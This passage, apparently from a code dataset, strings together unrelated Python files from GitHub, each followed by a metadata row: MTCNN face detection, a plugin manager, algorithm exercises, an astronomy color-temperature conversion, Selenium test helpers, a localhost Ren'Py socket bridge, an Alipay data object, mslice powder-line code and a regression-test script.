        """Load the three stage networks from ``model_dir``; the file names
        depend on the ``load`` flag (two naming conventions supported)."""
        test_ = self.test
        load_ = self.load
        if load_ :
            deploy = '12net.prototxt'
            caffemodel = '12net.caffemodel'
        else:
            deploy = 'PNet.prototxt'
            caffemodel = 'PNet.caffemodel'
        deploy = os.path.join(model_dir,deploy)
        caffemodel = os.path.join(model_dir,caffemodel)
        self.net_12 = caffe.Net(deploy,caffemodel,caffe.TEST)
        if load_:
            deploy = '24net.prototxt'
            caffemodel = '24net.caffemodel'
        else:
            deploy = 'RNet.prototxt'
            caffemodel = 'RNet.caffemodel'
        deploy = os.path.join(model_dir,deploy)
        caffemodel = os.path.join(model_dir,caffemodel)
        self.net_24 = caffe.Net(deploy,caffemodel,caffe.TEST)
        if load_:
            deploy = '48net.prototxt'
            caffemodel = '48net.caffemodel'
        else:
            deploy = "onet.prototxt"
            caffemodel = "onet.caffemodel"
        deploy = os.path.join(model_dir,deploy)
        caffemodel = os.path.join(model_dir,caffemodel)
        self.net_48 = caffe.Net(deploy,caffemodel,caffe.TEST)

    def PNet_(self,caffe_img):
        """Stage 1: run the proposal net over an image pyramid and return
        NMS-merged candidate rectangles."""
        origin_h,origin_w,ch = caffe_img.shape
        scales = tools.calculateScales(caffe_img,self.min_size)
        out = []
        for scale in scales:
            hs = int(origin_h*scale)
            ws = int(origin_w*scale)
            #print(hs,ws)
            if self.test:
                scale_img = cv2.resize(caffe_img,(ws,hs))
                scale_img = np.swapaxes(scale_img, 0, 2)
                self.net_12.blobs['data'].reshape(1,3,ws,hs)
            else:
                scale_img = cv2.resize(caffe_img,(ws,hs))
                scale_img = np.transpose(scale_img, (2,0,1))
                self.net_12.blobs['data'].reshape(1,3,hs,ws)
            scale_img = np.asarray(scale_img,dtype=np.float32)
            self.net_12.blobs['data'].data[...]=scale_img
            out_ = self.net_12.forward()
            out.append(out_)
        image_num = len(scales)
        rectangles = []
        for i in range(image_num):
            cls_prob = out[i]['prob1'][0][1]
            if self.test:
                roi = out[i]['conv4-2'][0]
                #roi = out[i]['conv4_2'][0]
            else:
                roi = out[i]['conv4_2'][0]
            out_h,out_w = cls_prob.shape
            out_side = max(out_h,out_w)
            rectangle = tools.detect_face_12net(cls_prob,roi,out_side,1/scales[i],origin_w,origin_h,self.threshold[0])
            rectangles.extend(rectangle)
        # Merge overlapping proposals across all pyramid levels.
        rectangles_box = tools.NMS(rectangles,0.7,'iou')
        return rectangles_box

    def RNet_(self,caffe_img,rectangles):
        """Stage 2: rescore/refine stage-1 candidates on 24x24 crops."""
        origin_h,origin_w,ch = caffe_img.shape
        self.net_24.blobs['data'].reshape(len(rectangles),3,24,24)
        crop_number = 0
        for rectangle in rectangles:
            crop_img = caffe_img[int(rectangle[1]):int(rectangle[3]), int(rectangle[0]):int(rectangle[2])]
            scale_img = cv2.resize(crop_img,(24,24))
            if self.test:
                scale_img = np.swapaxes(scale_img, 0, 2)
            else:
                scale_img = np.transpose(scale_img,(2,0,1))
            scale_img = np.asarray(scale_img,dtype=np.float32)
            self.net_24.blobs['data'].data[crop_number] =scale_img
            crop_number += 1
        out = self.net_24.forward()
        cls_prob = out['prob1']
        if self.test:
            roi_prob = out['conv5-2']
            #roi_prob = out['bbox_fc']
            #pts_prob = out['landmark_fc']
        else:
            roi_prob = out['bbox_fc']
        rectangles_box = tools.filter_face_24net(cls_prob,roi_prob,rectangles,origin_w,origin_h,self.threshold[1])
        #rectangles_box = tools.filter_face_48net(cls_prob,roi_prob,pts_prob,rectangles,origin_w,origin_h,self.threshold[1])
        return rectangles_box

    def ONet_(self,caffe_img,rectangles):
        """Stage 3: final scoring, box refinement and landmark regression
        on 48x48 crops."""
        origin_h,origin_w,ch = caffe_img.shape
        self.net_48.blobs['data'].reshape(len(rectangles),3,48,48)
        crop_number = 0
        for rectangle in rectangles:
            crop_img = caffe_img[int(rectangle[1]):int(rectangle[3]), int(rectangle[0]):int(rectangle[2])]
            scale_img = cv2.resize(crop_img,(48,48))
            if self.test:
                scale_img = np.swapaxes(scale_img, 0, 2)
            else:
                scale_img = np.transpose(scale_img,(2,0,1))
            scale_img = np.asarray(scale_img,dtype=np.float32)
            self.net_48.blobs['data'].data[crop_number] =scale_img
            crop_number += 1
        out = self.net_48.forward()
        cls_prob = out['prob1']
        if self.test:
            roi_prob = out['conv6-2']
            pts_prob = out['conv6-3']
            #roi_prob = out['bbox_fc']
            #pts_prob = out['landmark_fc']
        else:
            roi_prob = out['bbox_fc']
            pts_prob = out['landmark_fc']
        rectangles_box = tools.filter_face_48net(cls_prob,roi_prob,pts_prob,rectangles,origin_w,origin_h,self.threshold[2])
        return rectangles_box

    def detectFace(self,img):
        """Run the full cascade on a BGR image.

        config.pnet_out / config.rnet_out / config.onet_out act as
        debug/early-exit switches; config.time enables timing prints.
        """
        #img = cv2.imread(img_path)
        img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
        # Standard MTCNN input normalisation to roughly [-1, 1].
        caffe_img = (img.copy()-127.5)/128
        #origin_h,origin_w,ch = caffe_img.shape
        t = time.time()
        rectangles = self.PNet_(caffe_img)
        if config.onet_out:
            # Keep the raw PNet proposals so ONet can run on them directly.
            rectangles_back = rectangles
        if len(rectangles)==0 or config.pnet_out:
            return rectangles
        if config.time:
            print("Pnet proposals ",len(rectangles))
        t1 = time.time()-t
        t = time.time()
        rectangles = self.RNet_(caffe_img,rectangles)
        t2 = time.time()-t
        t = time.time()
        if len(rectangles)==0 or config.rnet_out:
            return rectangles
        if config.onet_out:
            rectangles = self.ONet_(caffe_img,rectangles_back)
        else:
            rectangles = self.ONet_(caffe_img,rectangles)
        t3 = time.time()-t
        if config.time:
            print("time cost " + '{:.3f}'.format(t1+t2+t3) + ' pnet {:.3f} rnet {:.3f} onet{:.3f}'.format(t1, t2,t3))
        return rectangles
| jimeffry/face-anti-spoofing | src/face_test/Detector.py | Detector.py | py | 9,170 | python | en | code | 37 | github-code | 13 |
74005965139 | import importlib
import logging
from collections import defaultdict
from axel import Event
from hmcs import config
log = logging.getLogger(__name__)
class PluginManager():
    """Loads the configured plugins and dispatches socket events to them.

    Plugins subscribe callbacks per event name; incoming socket events
    are fanned out to every subscriber of that event.
    """

    def __init__(self):
        self.system_init = Event()
        self.socket_event_received = Event()
        self.socket_event_received += self._on_socket_event_received
        self._socket_event_subscribers = defaultdict(list)
        self._plugins = []

    def _import_class(self, full_path):
        """Import and return the class named by the dotted *full_path*."""
        path, class_name = full_path.rsplit('.', 1)
        return getattr(importlib.import_module(path), class_name)

    def init_plugins(self):
        """Instantiate, register and retain every plugin listed in config,
        then fire the system_init event."""
        for name, path in config.PLUGINS_ENABLED.items():
            cls = self._import_class(path)
            obj = cls(self, config.PLUGIN_CONFIG.get(name, {}))
            obj.register()
            self._plugins.append(obj)
        self.system_init()

    def subscribe_to_socket_event(self, event_name, callback):
        """Register *callback* to be invoked with the event data whenever
        *event_name* is received."""
        assert callable(callback)
        self._socket_event_subscribers[event_name].append(callback)

    def _on_socket_event_received(self, event_name, data):
        """Fan the event out to all subscribers; one failing callback must
        not prevent the others from running."""
        for callback in self._socket_event_subscribers[event_name]:
            try:
                callback(data)
            # Was a bare ``except:``, which would also swallow SystemExit
            # and KeyboardInterrupt; only genuine errors are logged here.
            except Exception:
                log.exception(
                    'Failed to call method %s for event %s',
                    callback,
                    event_name,
                )
class PluginBase():
    """Common base class for plugins.

    Keeps a reference to the owning PluginManager and this plugin's own
    configuration dictionary.
    """

    def __init__(self, manager, plugin_config):
        self._config = plugin_config
        self._manager = manager

    def register(self):
        """
        Plugins should do some initialization here, like subscribe to events.
        """
class Solution:
    def sortArrayByParity(self, nums: List[int]) -> List[int]:
        """Return *nums* with all even values first, preserving the
        relative order inside the even group and inside the odd group."""
        # A stable sort on parity (0 for even, 1 for odd) keeps every even
        # value before every odd one without reordering within a group.
        return sorted(nums, key=lambda n: n % 2)
37862132113 | import numpy as np
from PyAstronomy.pyaC import pyaErrors as PE
class BallesterosBV_T:
    """
    Black-body based conversion between effective temperature and B-V color.

    Ballesteros 2012 (EPL 97, 34008) present a conversion between
    effective temperature and B-V color index based on a black body
    spectrum and the filter functions.
    """

    def __init__(self):
        # Fit coefficients of the Ballesteros 2012 relation.
        self._a = 0.92
        self._b = 1.7
        self._c = 0.62
        self._T0 = 4600.0

    def bv2T(self, bv):
        """
        Convert B-V color into temperature.

        Parameters
        ----------
        bv : float
            B-V color index [mag]

        Returns
        -------
        T : float
            Temperature [K]
        """
        term1 = 1.0 / (self._a * bv + self._b)
        term2 = 1.0 / (self._a * bv + self._c)
        return self._T0 * (term1 + term2)

    def t2bv(self, T):
        """
        Convert temperature into B-V color.

        Parameters
        ----------
        T : float
            Temperature in K.

        Returns
        -------
        bv : float
            B-V color index [mag].
        """
        z = T / self._T0
        # Inverting the bv2T relation gives a quadratic
        # qa*bv**2 + qb*bv + qc = 0 in the color index.
        qa = z * self._a**2
        qb = self._a * self._c * z + self._b * self._a * z - 2.0 * self._a
        qc = self._b * self._c * z - self._c - self._b
        disc = qb**2 - 4.0 * qa * qc
        # By comparison with a black body it can be verified that the
        # physical solution is the one with the positive root.
        return (-qb + np.sqrt(disc)) / (2.0 * qa)
def bv2T_Ballesteros(bv):
    # Module-level convenience wrapper around BallesterosBV_T.bv2T.
    return BallesterosBV_T().bv2T(bv)

bv2T_Ballesteros.__doc__ = BallesterosBV_T.bv2T.__doc__
def t2bv_Ballesteros(T):
    # Module-level convenience wrapper around BallesterosBV_T.t2bv.
    return BallesterosBV_T().t2bv(T)

t2bv_Ballesteros.__doc__ = BallesterosBV_T.t2bv.__doc__
40242623492 | '''
lets say we have 2 arrays a1 = [a,b] and a2 = [c,d]
Intervals can be merged if a1[0] < a2[0] => this is acheived by sorting the intervals
Intervals can be merged if a2[0] < a1[1]
'''
class Solution:
def merge(self, intervals):
intervals.sort(key =lambda x: x[0])
merged = []
for i in intervals:
# if the list of merged intervals is empty
# or if the current interval does not overlap with the previous,
# simply append it.
if not merged or merged[-1][-1] < i[0]:
merged.append(i)
# otherwise, there is overlap,
#so we merge the current and previous intervals.
else:
merged[-1][-1] = max(merged[-1][-1], i[-1])
print(merged)
return merged
if __name__ == '__main__':
    # Smoke test for Solution.merge. (The original assigned a first
    # intervals list that was immediately overwritten; the dead
    # assignment has been removed.)
    s = Solution()
    intervals = [[1, 5], [2, 3], [4, 8], [9, 10]]
    print(s.merge(intervals))
27227523674 | from model.contact import Contact
import re
class ContactHelper:
    """Page-object style helper for the address-book contact pages,
    driving the application through a Selenium WebDriver (self.app.wd)."""
    def __init__(self, app):
        self.app = app
    def change_field_value(self, field_name, text):
        """Type *text* into the input named *field_name*; None leaves it unchanged."""
        wd = self.app.wd
        if text is not None:
            wd.find_element_by_name(field_name).click()
            wd.find_element_by_name(field_name).clear()
            wd.find_element_by_name(field_name).send_keys(text)
    def fill_contact_form(self, contact):
        """Fill every supported form field from the *contact* model object."""
        self.change_field_value("firstname", contact.firstname)
        self.change_field_value("middlename", contact.middlename)
        self.change_field_value("lastname", contact.lastname)
        self.change_field_value("nickname", contact.nickname)
        self.change_field_value("company", contact.company)
        self.change_field_value("address", contact.address)
        self.change_field_value("home", contact.homephone)
        self.change_field_value("mobile", contact.mobilephone)
        self.change_field_value("work", contact.workphone)
        self.change_field_value("fax", contact.fax)
        self.change_field_value("email", contact.email)
    def create(self, contact):
        """Open the 'add new' page, submit *contact* and invalidate the cache."""
        wd = self.app.wd
        wd.find_element_by_xpath("/html/body/div/div[3]/ul/li[2]/a").click()
        self.fill_contact_form(contact)
        wd.find_element_by_name("submit").click()
        self.app.return_home()
        self.contact_cache = None
    def delete_first_contact(self):
        """Delete the first contact in the home-page list."""
        self.delete_contact_by_index(0)
    def delete_contact_by_index(self, index):
        """Select the contact at *index*, delete it and confirm the alert."""
        wd = self.app.wd
        self.select_contact_by_index(index)
        wd.find_element_by_xpath("/html/body/div/div[4]/form[2]/div[2]/input").click()
        # NOTE(review): switch_to_alert() is deprecated in newer Selenium
        # (switch_to.alert) -- kept as-is to match the pinned driver version.
        wd.switch_to_alert().accept()
        self.contact_cache = None
    def select_contact_by_index(self, index):
        """Tick the selection checkbox of the contact at *index*."""
        wd = self.app.wd
        wd.find_elements_by_name("selected[]")[index].click()
    def modify_contact_by_index(self, index, contact):
        """Open the edit page for the contact at *index* and overwrite its fields."""
        wd = self.app.wd
        self.select_contact_by_index(index)
        wd.find_element_by_css_selector('img[alt="Edit"]').click()
        self.fill_contact_form(contact)
        wd.find_element_by_name("update").click()
        self.app.return_home()
        self.contact_cache = None
    def count(self):
        """Return the number of contacts shown on the home page."""
        wd = self.app.wd
        self.app.return_home()
        return len(wd.find_elements_by_name("selected[]"))
    def open_add_contact_page(self):
        """Navigate to the 'add new' contact page unless it is already open."""
        wd = self.app.wd
        if not (wd.current_url.endswith("/edit.php") and len(wd.find_elements_by_name("photo")) > 0):
            wd.find_element_by_link_text("add new").click()
    # Cached list of Contact models; None means the cache is stale.
    contact_cache = None
    @property
    def get_contacts_list(self):
        """Return (and lazily cache) the contacts parsed from the home-page table."""
        if self.contact_cache is None:
            wd = self.app.wd
            self.app.open_home_page()
            self.contact_cache = []
            for row in wd.find_elements_by_name("entry"):
                cells = row.find_elements_by_tag_name("td")
                # Column layout: 0=checkbox(id), 1=last name, 2=first name,
                # 5=all phone numbers merged into one cell.
                lastname = cells[1].text
                firstname = cells[2].text
                id = cells[0].find_element_by_tag_name("input").get_attribute("value")
                all_phones = cells[5].text
                self.contact_cache.append(Contact(lastname=lastname, firstname=firstname, id=id,
                                                  all_phones_from_home_page=all_phones))
        # Return a copy so callers cannot mutate the cache.
        return list(self.contact_cache)
    def open_contact_view_by_index(self, index):
        """Open the read-only details page of the contact at *index*."""
        wd = self.app.wd
        self.app.open_home_page()
        row = wd.find_elements_by_name("entry")[index]
        cell = row.find_elements_by_tag_name("td")[6]
        cell.find_element_by_tag_name("a").click()
    def open_contact_to_edit_by_index(self, index):
        """Open the edit page of the contact at *index*."""
        wd = self.app.wd
        self.app.open_home_page()
        row = wd.find_elements_by_name("entry")[index]
        cell = row.find_elements_by_tag_name("td")[7]
        cell.find_element_by_tag_name("a").click()
    def get_contact_info_from_edit_page(self, index):
        """Read name, id and phone fields from the edit form into a Contact."""
        wd = self.app.wd
        self.open_contact_to_edit_by_index(index)
        firstname = wd.find_element_by_name("firstname").get_attribute("value")
        lastname = wd.find_element_by_name("lastname").get_attribute("value")
        id = wd.find_element_by_name("id").get_attribute("value")
        homephone = wd.find_element_by_name("home").get_attribute("value")
        workphone = wd.find_element_by_name("work").get_attribute("value")
        mobilephone = wd.find_element_by_name("mobile").get_attribute("value")
        return Contact(firstname=firstname, lastname=lastname, id=id, homephone=homephone, workphone=workphone, mobilephone=mobilephone)
    def get_contacts_from_view_page(self, index):
        """Scrape the phone numbers from the read-only view page
        (lines formatted as 'H: ...', 'W: ...', 'M: ...')."""
        wd = self.app.wd
        self.open_contact_view_by_index(index)
        text = wd.find_element_by_id("content").text
        homephone = re.search("H: (.*)", text).group(1)
        workphone = re.search("W: (.*)", text).group(1)
        mobilephone = re.search("M: (.*)", text).group(1)
        return Contact(homephone=homephone, mobilephone=mobilephone,
                       workphone=workphone)
29187517042 | # Using sockets to transfer data between Ren'Py and MASM
# TODO: Ping-Pong alive check messages
import json
import time
import socket
import threading
class MASM:
    """Static UDP bridge between Ren'Py and MASM.

    A background thread fills ``data`` with (key, value) pairs decoded
    from JSON datagrams received on 127.0.0.1:24489; outgoing pairs are
    sent to 127.0.0.1:24488.  All access to ``data`` is guarded by
    ``commLock``; the ``hasData*`` helpers pop entries atomically.
    """

    data = {}
    commThread = None
    serverSocket = None
    commRun = threading.Event()
    commLock = threading.Lock()

    @staticmethod
    def _startThread():
        """Create the socket (if needed) and start the receiver thread."""
        MASM._connectMAS()
        MASM.commThread = threading.Thread(target = MASM._receiveData)
        MASM.commThread.start()

    @staticmethod
    def _stopAll():
        """Signal the receiver to stop, join it and close the socket."""
        MASM.commRun.set()
        MASM.commThread.join()
        MASM.serverSocket.close()

    @staticmethod
    def _connectMAS():
        """Bind the local UDP socket and announce readiness to MAS."""
        if MASM.serverSocket is None:
            try:
                print("Creating server socket..", end=" ")
                MASM.serverSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                # Short timeout so the receive loop can poll commRun.
                MASM.serverSocket.settimeout(0.1)
                MASM.serverSocket.bind(("127.0.0.1", 24489))
                print("Done")
                print("Sending ready message..", end=" ")
                MASM.sendData("MASM_READY", True)
                print("Done")
            except Exception as e:
                print(f"Creating socket exception: {e}")

    @staticmethod
    def _receiveData():
        """Receiver loop: decode JSON datagrams into ``data`` until stopped.

        "ping" messages are answered with "pong" instead of being stored.
        """
        while not MASM.commRun.is_set():
            try:
                recv, addr = MASM.serverSocket.recvfrom(256)
                if recv is not None:
                    recv = json.loads(recv.decode("utf-8"))
                    print(f"Received: {recv}")
                    if recv[0] == "ping":
                        MASM.sendData("pong")
                    else:
                        with MASM.commLock:
                            MASM.data[recv[0]] = recv[1]
            except socket.timeout:
                time.sleep(0) # Yield thread
                continue # No data
            except socket.error as e:
                print(f"Socket receive error: {e}") # Log but pass
            except Exception as e:
                print(f"Socketer socket exception: {e}")

    @staticmethod
    def sendData(sendKey, sendValue = True):
        """Send one (key, value) pair to MASM as a JSON-encoded datagram."""
        if MASM.serverSocket is not None:
            MASM.serverSocket.sendto(json.dumps((sendKey, sendValue)).encode("utf-8"), ("127.0.0.1", 24488))

    @staticmethod
    def hasDataWith(dictKey):
        """Pop and return the first (key, value) pair whose key starts with
        *dictKey*; return (None, None) when there is no match."""
        with MASM.commLock:
            # Rewritten without the former bare ``except:`` that relied on
            # a TypeError on the no-match None as control flow.
            found = next(((k, v) for k, v in MASM.data.items() if k.startswith(dictKey)), None)
            if found is None:
                return (None, None)
            del MASM.data[found[0]]
            return found

    @staticmethod
    def hasDataValue(dictKey, defaultValue = None):
        """Pop and return the value stored under *dictKey*, or *defaultValue*
        when the key is absent."""
        res = defaultValue
        with MASM.commLock:
            got = MASM.data.get(dictKey, None)
            if got is not None:
                res = got
                del MASM.data[dictKey]
        return res

    @staticmethod
    def hasDataBool(dictKey):
        """Pop *dictKey* if present; return whether it was present."""
        res = False
        with MASM.commLock:
            if dictKey in MASM.data:
                res = True
                del MASM.data[dictKey]
        return res

    @staticmethod
    def hasDataCheck(dictKey, expectedType = None):
        """Non-destructively check that *dictKey* exists (and, if given,
        that its value is exactly of type *expectedType*)."""
        res = False
        with MASM.commLock:
            val = MASM.data.get(dictKey, None)
            if val is not None and (expectedType is None or type(val) is expectedType):
                res = True
        return res
def Start():
    # Entry point called by the game script: spin up the receiver thread.
    MASM._startThread()
def OnQuit():
    # Entry point called on shutdown: stop the thread and close the socket.
    MASM._stopAll()
# Stair-climbing DP (BOJ 2579): maximise the score, stepping up one or two
# stairs at a time, never three consecutive stairs, last stair mandatory.
# (A commented-out duplicate implementation and a debug stdin redirect
# were removed.)
N = int(input())

# Pad both arrays by 3 so that N of 1 or 2 needs no special casing:
# the padded entries stay 0 and never affect the maximum.
stair = [0] * (N + 3)
dp = [0] * (N + 3)
for i in range(N):
    stair[i] = int(input())

# Base cases for the first three stairs.
dp[0] = stair[0]
dp[1] = stair[0] + stair[1]
dp[2] = max(stair[1] + stair[2], stair[0] + stair[2])
for i in range(3, N):
    # Reach stair i either from i-3 via i-1 (using the two-in-a-row
    # allowance) or directly from i-2.
    dp[i] = max(dp[i - 3] + stair[i - 1] + stair[i], dp[i - 2] + stair[i])

print(dp[N - 1])
17061306394 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class VehModelDto(object):
    """Vehicle model data-transfer object for the Alipay OpenAPI.

    Behaviour is identical to the original hand-expanded version: every
    field is exposed as a read/write property backed by a ``_<name>``
    attribute initialised to None, ``to_alipay_dict`` serialises all
    truthy fields (nested API objects recursively via their own
    ``to_alipay_dict``) and ``from_alipay_dict`` builds an instance from
    a plain dict.  The per-field boilerplate, previously repeated by
    hand for all 34 fields, is generated from ``_FIELDS``.
    """

    # Field names in the order they appeared in the original definition
    # (also fixes the key order of to_alipay_dict's result).
    _FIELDS = (
        "acid", "body_type", "brand_id", "brand_logo_url", "brand_name",
        "car_type", "cylinder_arrangement", "cylinders_num", "displacement",
        "doors_num", "drive_mode", "emission_standard", "fuel_injection",
        "fuel_type", "horsepower", "intake", "manufacturer_id",
        "manufacturer_name", "power_kw", "power_rpm", "price", "sale_name",
        "sale_years", "seat_num", "series_id", "series_image_url",
        "series_name", "show_name", "torque_nm", "torque_rpm",
        "transmission", "transmission_type", "vehicle_size", "vehicle_type",
    )

    def __init__(self):
        # Every field starts out unset (None), exactly as before.
        for field in self._FIELDS:
            setattr(self, "_" + field, None)

    def to_alipay_dict(self):
        """Serialise all truthy fields into a plain dict.

        Falsy values (None, 0, "", ...) are skipped, matching the
        original ``if self.<field>:`` checks.
        """
        params = dict()
        for field in self._FIELDS:
            value = getattr(self, "_" + field)
            if value:
                if hasattr(value, 'to_alipay_dict'):
                    params[field] = value.to_alipay_dict()
                else:
                    params[field] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a VehModelDto from a plain dict; returns None for
        empty/None input."""
        if not d:
            return None
        o = VehModelDto()
        for field in VehModelDto._FIELDS:
            if field in d:
                setattr(o, field, d[field])
        return o


def _veh_model_property(field):
    """Create the read/write property backing ``_<field>`` on VehModelDto."""
    attr = "_" + field

    def getter(self):
        return getattr(self, attr)

    def setter(self, value):
        setattr(self, attr, value)

    return property(getter, setter)


# Attach one property per field, replacing the 34 hand-written
# getter/setter pairs of the original.
for _field in VehModelDto._FIELDS:
    setattr(VehModelDto, _field, _veh_model_property(_field))
del _field
5661290639 | import numpy as np
from scipy import constants
from mantid.geometry import CrystalStructure, ReflectionGenerator, ReflectionConditionFilter
from mslice.models.labels import is_momentum, is_twotheta
from mslice.models.workspacemanager.workspace_provider import get_workspace_handle
from mslice.util.mantid.mantid_algorithms import LoadCIF
# energy to wavelength conversion E = h^2/(2*m_n*l^2)
# (the 1e23 factor folds the unit conversions; presumably E in meV and
#  wavelength l in Angstrom -- TODO confirm against callers)
E2L = 1.e23 * constants.h ** 2 / (2 * constants.m_n * constants.e)

# Lattice parameters, space group and atom-site string for common sample
# environment materials, in the positional-argument order expected by
# mantid's CrystalStructure.
crystal_structure = {'Copper': ['3.6149 3.6149 3.6149', 'F m -3 m', 'Cu 0 0 0 1.0 0.05'],
                     'Aluminium': ['4.0495 4.0495 4.0495', 'F m -3 m', 'Al 0 0 0 1.0 0.05'],
                     'Niobium': ['3.3004 3.3004 3.3004', 'I m -3 m', 'Nb 0 0 0 1.0 0.05'],
                     'Tantalum': ['3.3013 3.3013 3.3013', 'I m -3 m', 'Ta 0 0 0 1.0 0.05']}
def compute_dvalues(d_min, d_max, structure):
    """Return the allowed d-spacings of *structure* within [d_min, d_max],
    sorted in descending order (largest d first)."""
    generator = ReflectionGenerator(structure)
    # Keep only reflections with a non-zero structure factor.
    hkls = generator.getUniqueHKLsUsingFilter(d_min, d_max,
                                              ReflectionConditionFilter.StructureFactor)
    dvalues = np.sort(np.array(generator.getDValues(hkls)))[::-1]
    return dvalues
def _compute_powder_line_momentum(ws_name, q_axis, element, cif_file):
    """Powder reflection positions in momentum transfer |Q| over *q_axis*."""
    two_pi = 2.0 * np.pi
    # Q = 2*pi/d, so the Q window maps to a d window with the ends swapped;
    # the axis start is clamped to avoid dividing by ~0.
    d_min = two_pi / q_axis.end
    d_max = two_pi / np.max([q_axis.start, 0.01])
    structure = _crystal_structure(ws_name, element, cif_file)
    return two_pi / compute_dvalues(d_min, d_max, structure)
def _compute_powder_line_degrees(ws_name, theta_axis, element, efixed, cif_file):
    """Powder reflection positions in scattering angle (degrees) over *theta_axis*."""
    wavelength = np.sqrt(E2L / efixed)
    # Bragg's law lambda = 2*d*sin(theta); the axis holds 2*theta in degrees,
    # hence the factor 0.5 before converting to radians.
    half_start = np.deg2rad(theta_axis.start * 0.5)
    half_end = np.deg2rad(theta_axis.end * 0.5)
    d_min = wavelength / (2 * np.sin(half_end))
    d_max = wavelength / (2 * np.sin(half_start))
    structure = _crystal_structure(ws_name, element, cif_file)
    dvalues = compute_dvalues(d_min, d_max, structure)
    return 2 * np.arcsin(wavelength / 2 / dvalues) * 180 / np.pi
def compute_powder_line(ws_name, axis, element, cif_file=False):
    """Return (x, y) plot data marking powder reflections on *axis*.

    Each reflection becomes a vertical segment of height +-efixed/20 at
    its axis position, with NaN separators so the segments plot as
    disjoint lines.

    Raises RuntimeError when the axis units are neither momentum nor
    two-theta.
    """
    efixed = get_workspace_handle(ws_name).e_fixed
    if is_momentum(axis.units):
        x0 = _compute_powder_line_momentum(ws_name, axis, element, cif_file)
    elif is_twotheta(axis.units):
        x0 = _compute_powder_line_degrees(ws_name, axis, element, efixed, cif_file)
    else:
        raise RuntimeError("units of axis not recognised")
    # Build the segment lists in one pass instead of the former quadratic
    # sum(list-of-lists, []) concatenation (which also looped over an
    # unused variable for y).
    x = [v for xv in x0 for v in (xv, xv, np.nan)]
    y = [v for _ in x0 for v in (efixed / 20, -efixed / 20, np.nan)]
    return x, y
def _crystal_structure(ws_name, element, cif_file):
    """Resolve the crystal structure: from *cif_file* when given, otherwise
    from the built-in table of known elements."""
    if cif_file:
        ws = get_workspace_handle(ws_name).raw_ws
        # Loading the CIF attaches the crystal structure to the workspace sample.
        LoadCIF(Workspace=ws, InputFile=cif_file)
        return ws.sample().getCrystalStructure()
    else:
        return CrystalStructure(*crystal_structure[element])
| mantidproject/mslice | src/mslice/models/powder/powder_functions.py | powder_functions.py | py | 2,795 | python | en | code | 1 | github-code | 13 |
# Greedy "add or multiply": fold the digit string left to right, choosing
# the operation that maximises the running result at each step.
data = input()

result = int(data[0])

for i in range(1, len(data)):
    num = int(data[i])
    if result <= 1 or num <= 1:  # if either operand is <= 1, adding beats (or ties) multiplying
        result += num
    else:
        result *= num

print(result)
31418984932 | #
#
# Copyright (C) University of Melbourne 2012
#
#
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
#
#
"""Performs a basic regression test on the
directory provided, for the ge demo code.
It checks simply that the
final results are in agreement, and if not, writes
both of the 'all_years_out' structures out to the
file diff.txt. The run log is at test.log.
This is written to be called from the test.py files
in the subdirectories.
"""
import sys
sys.path.append('..')
import os
import rungedemo
import pickle
import pprint
def ge_test(file_dir, config_name, pickle_name, data_file):
    """Run the ge demo in *file_dir* and compare against the expected pickle.

    Runs rungedemo with *config_name* on the contents of *data_file*,
    pickles the result to test_out.pkl and compares it with the expected
    pickle *pickle_name*.  On a mismatch both structures are
    pretty-printed to diff.txt.  Returns True when the results match.
    """
    cwd = os.getcwd()
    os.chdir(file_dir)

    config_file = config_name
    pickle_file = pickle_name
    new_pickle_file = 'test_out.pkl'
    new_log_file = 'test.log'
    new_diff_file = 'diff.txt'

    # Remove leftovers from a previous run so stale files can't mask failures.
    for leftover in (new_pickle_file, new_log_file, new_diff_file):
        if os.path.isfile(leftover):
            os.remove(leftover)

    flags = ['-f', config_file,
             '-l', new_log_file, '-d', 'DEBUG']

    with open(data_file) as f:
        input_data = f.read()

    all_years_out = rungedemo.rungedemo(flags, input_data)

    # Context managers close the pickle files deterministically; the
    # original leaked the handles returned by the bare open() calls.
    with open(new_pickle_file, "wb") as f:
        pickle.dump(all_years_out, f)

    if os.path.isfile(new_pickle_file):
        with open(pickle_file, 'rb') as f:
            exp_result = pickle.load(f)
        with open(new_pickle_file, 'rb') as f:
            new_result = pickle.load(f)

        match = (exp_result == new_result)

        if not match:
            with open(file_dir + '/' + 'diff.txt', 'w') as f:
                pp = pprint.PrettyPrinter(indent=4, stream=f)
                f.write('Expected results\n')
                f.write('=======================\n')
                pp.pprint(exp_result)
                f.write('This run results\n')
                f.write('=======================\n')
                pp.pprint(new_result)
    else:
        match = False

    os.chdir(cwd)
    return match
| zarppy/MUREIL_2014 | test_regression/ge_test.py | ge_test.py | py | 3,072 | python | en | code | 0 | github-code | 13 |
32799560271 | import os
from python.request.endpoint.EndpointUtils import EndpointType
from python.utils import ConfigUtils
# Class handling the creation of Endpoint objects
# In particular, it manages the corresponding urls depending on each endpoint type
class EndPointGenerator:
    """Creates Endpoint objects and manages their URLs per endpoint type.

    Location and GBR monitoring endpoints get numbered URLs so several
    of each kind can coexist.
    """

    def __init__(self, flask_port):
        self.flask_port = flask_port
        self.endpoints = []
        self.num_location_ep = 0
        self.num_gbr_ep = 0

    # Call me to create an endpoint dedicated to communication with 5G
    # components (ex: the NEF emulator)
    def create_5gcore_endpoint(self, func, type_endpoint):
        if type_endpoint == EndpointType.UE_LOCATION:
